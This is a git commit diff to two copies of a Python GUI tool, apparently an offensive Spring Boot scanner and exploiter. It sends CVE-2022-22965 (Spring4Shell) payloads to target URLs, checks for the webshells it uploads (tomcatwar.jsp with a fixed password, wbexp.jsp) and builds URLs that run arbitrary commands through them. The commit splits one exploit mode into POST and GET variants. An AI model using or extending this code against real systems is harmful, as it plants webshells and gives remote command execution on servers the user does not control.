Add files via upload

13exp · web-flow · commit f9f3b894bb73 · 2023-02-10T23:11:41.000+08:00
diff --git a/SpringBoot-Scan-GUI-Linux.py b/SpringBoot-Scan-GUI-Linux.py
@@ -46,7 +46,7 @@ def __init__(self):
       "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
       "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0",
       "Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00")
-        cves = ("CVE-2022-22965","CVE-2022-22963","CVE-2022-22947","22965-aabyss-shell","22965-13exp-shell")
+        cves = ("CVE-2022-22965","CVE-2022-22963","CVE-2022-22947","22965-13exp-shell","22965-aabyss-shell-post","22965-aabyss-shell-get")
         no_proxies = []
         proxy_list = []
         self.root = tk.Tk()
@@ -673,22 +673,27 @@ def CVE_2022_22965_aabysszg(self, url, proxies):
         data1 = payload_linux
         data2 = payload_win
         getpayload = url + payload_http
+        Vule = self.CVEs.get()
         try:
             requests.packages.urllib3.disable_warnings()
             if proxies != "":
-                requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
-                sleep(1)
-                requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
-                sleep(1)
-                requests.get(getpayload, headers=Headers_1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
-                sleep(1)
+                if Vule == "22965-aabyss-shell-post":
+                    requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
+                    sleep(1)
+                    requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
+                    sleep(1)
+                elif Vule == "22965-aabyss-shell-get":
+                    requests.get(getpayload, headers=Headers_1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
+                    sleep(1)
             else:
-                requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False)
-                sleep(1)
-                requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False)
-                sleep(1)
-                requests.get(getpayload, headers=Headers_1, timeout=6, allow_redirects=False, verify=False)
-                sleep(1)
+                if Vule == "22965-aabyss-shell-post":
+                    requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False)
+                    sleep(1)
+                    requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False)
+                    sleep(1)
+                elif Vule == "22965-aabyss-shell-get":
+                    requests.get(getpayload, headers=Headers_1, timeout=6, allow_redirects=False, verify=False)
+                    sleep(1)
             test = requests.get(url + "tomcatwar.jsp")
             if (test.status_code == 200) and ('aabysszg' in str(test.text)):
                 back = "[+] 存在编号为CVE-2022-22965的RCE漏洞，上传Webshell为：" + url + "tomcatwar.jsp?pwd=aabysszg&cmd=whoami"
@@ -833,7 +838,7 @@ def cve_2022_22965_exec(self):
             cmd = self.reverse_tcp.get()
             if self.CVEs.get() == 'CVE-2022-22965':
                 url_shell = url + "shell.jsp?cmd={}".format(cmd)
-            elif self.CVEs.get() == '22965-aabyss-shell':
+            elif '22965-aabyss-shell' in self.CVEs.get():
                 url_shell = url + "tomcatwar.jsp?pwd=aabysszg&cmd={}".format(cmd)
             elif self.CVEs.get() == '22965-13exp-shell':
                 url_shell = url + "wbexp.jsp?pwd=13exp&cmd={}".format(cmd)
@@ -1029,7 +1034,7 @@ def Vule(self):
                         self.CVE_2022_22963(i, proxies,execcmd)
                     elif Vule == "CVE-2022-22947":
                         self.CVE_2022_22947(i, proxies,execcmd)
-                    elif Vule == "22965-aabyss-shell":
+                    elif "22965-aabyss-shell" in Vule:
                         self.CVE_2022_22965_aabysszg(i, proxies)
                         
         else:
@@ -1051,7 +1056,7 @@ def Vule(self):
                     messagebox.showinfo("提示","执行命令不能为空,请重试！")
                 else:
                     self.CVE_2022_22947(url, proxies,execcmd)
-            elif Vule == "22965-aabyss-shell":
+            elif "22965-aabyss-shell" in Vule:
                 back = self.CVE_2022_22965_aabysszg(url, proxies)
                 if "[-]" in back:
                     back = "[+]执行二次验证中 等待5秒"
diff --git a/SpringBoot-Scan-GUI.py b/SpringBoot-Scan-GUI.py
@@ -46,7 +46,7 @@ def __init__(self):
       "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
       "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0",
       "Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00")
-        cves = ("CVE-2022-22965","CVE-2022-22963","CVE-2022-22947","22965-aabyss-shell","22965-13exp-shell")
+        cves = ("CVE-2022-22965","CVE-2022-22963","CVE-2022-22947","22965-13exp-shell","22965-aabyss-shell-post","22965-aabyss-shell-get")
         no_proxies = []
         proxy_list = []
         self.root = tk.Tk()
@@ -673,22 +673,27 @@ def CVE_2022_22965_aabysszg(self, url, proxies):
         data1 = payload_linux
         data2 = payload_win
         getpayload = url + payload_http
+        Vule = self.CVEs.get()
         try:
             requests.packages.urllib3.disable_warnings()
             if proxies != "":
-                requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
-                sleep(1)
-                requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
-                sleep(1)
-                requests.get(getpayload, headers=Headers_1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
-                sleep(1)
+                if Vule == "22965-aabyss-shell-post":
+                    requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
+                    sleep(1)
+                    requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
+                    sleep(1)
+                elif Vule == "22965-aabyss-shell-get":
+                    requests.get(getpayload, headers=Headers_1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
+                    sleep(1)
             else:
-                requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False)
-                sleep(1)
-                requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False)
-                sleep(1)
-                requests.get(getpayload, headers=Headers_1, timeout=6, allow_redirects=False, verify=False)
-                sleep(1)
+                if Vule == "22965-aabyss-shell-post":
+                    requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False)
+                    sleep(1)
+                    requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False)
+                    sleep(1)
+                elif Vule == "22965-aabyss-shell-get":
+                    requests.get(getpayload, headers=Headers_1, timeout=6, allow_redirects=False, verify=False)
+                    sleep(1)
             test = requests.get(url + "tomcatwar.jsp")
             if (test.status_code == 200) and ('aabysszg' in str(test.text)):
                 back = "[+] 存在编号为CVE-2022-22965的RCE漏洞，上传Webshell为：" + url + "tomcatwar.jsp?pwd=aabysszg&cmd=whoami"
@@ -833,7 +838,7 @@ def cve_2022_22965_exec(self):
             cmd = self.reverse_tcp.get()
             if self.CVEs.get() == 'CVE-2022-22965':
                 url_shell = url + "shell.jsp?cmd={}".format(cmd)
-            elif self.CVEs.get() == '22965-aabyss-shell':
+            elif '22965-aabyss-shell' in self.CVEs.get():
                 url_shell = url + "tomcatwar.jsp?pwd=aabysszg&cmd={}".format(cmd)
             elif self.CVEs.get() == '22965-13exp-shell':
                 url_shell = url + "wbexp.jsp?pwd=13exp&cmd={}".format(cmd)
@@ -1029,7 +1034,7 @@ def Vule(self):
                         self.CVE_2022_22963(i, proxies,execcmd)
                     elif Vule == "CVE-2022-22947":
                         self.CVE_2022_22947(i, proxies,execcmd)
-                    elif Vule == "22965-aabyss-shell":
+                    elif "22965-aabyss-shell" in Vule:
                         self.CVE_2022_22965_aabysszg(i, proxies)
                         
         else:
@@ -1051,7 +1056,7 @@ def Vule(self):
                     messagebox.showinfo("提示","执行命令不能为空,请重试！")
                 else:
                     self.CVE_2022_22947(url, proxies,execcmd)
-            elif Vule == "22965-aabyss-shell":
+            elif "22965-aabyss-shell" in Vule:
                 back = self.CVE_2022_22965_aabysszg(url, proxies)
                 if "[-]" in back:
                     back = "[+]执行二次验证中 等待5秒"
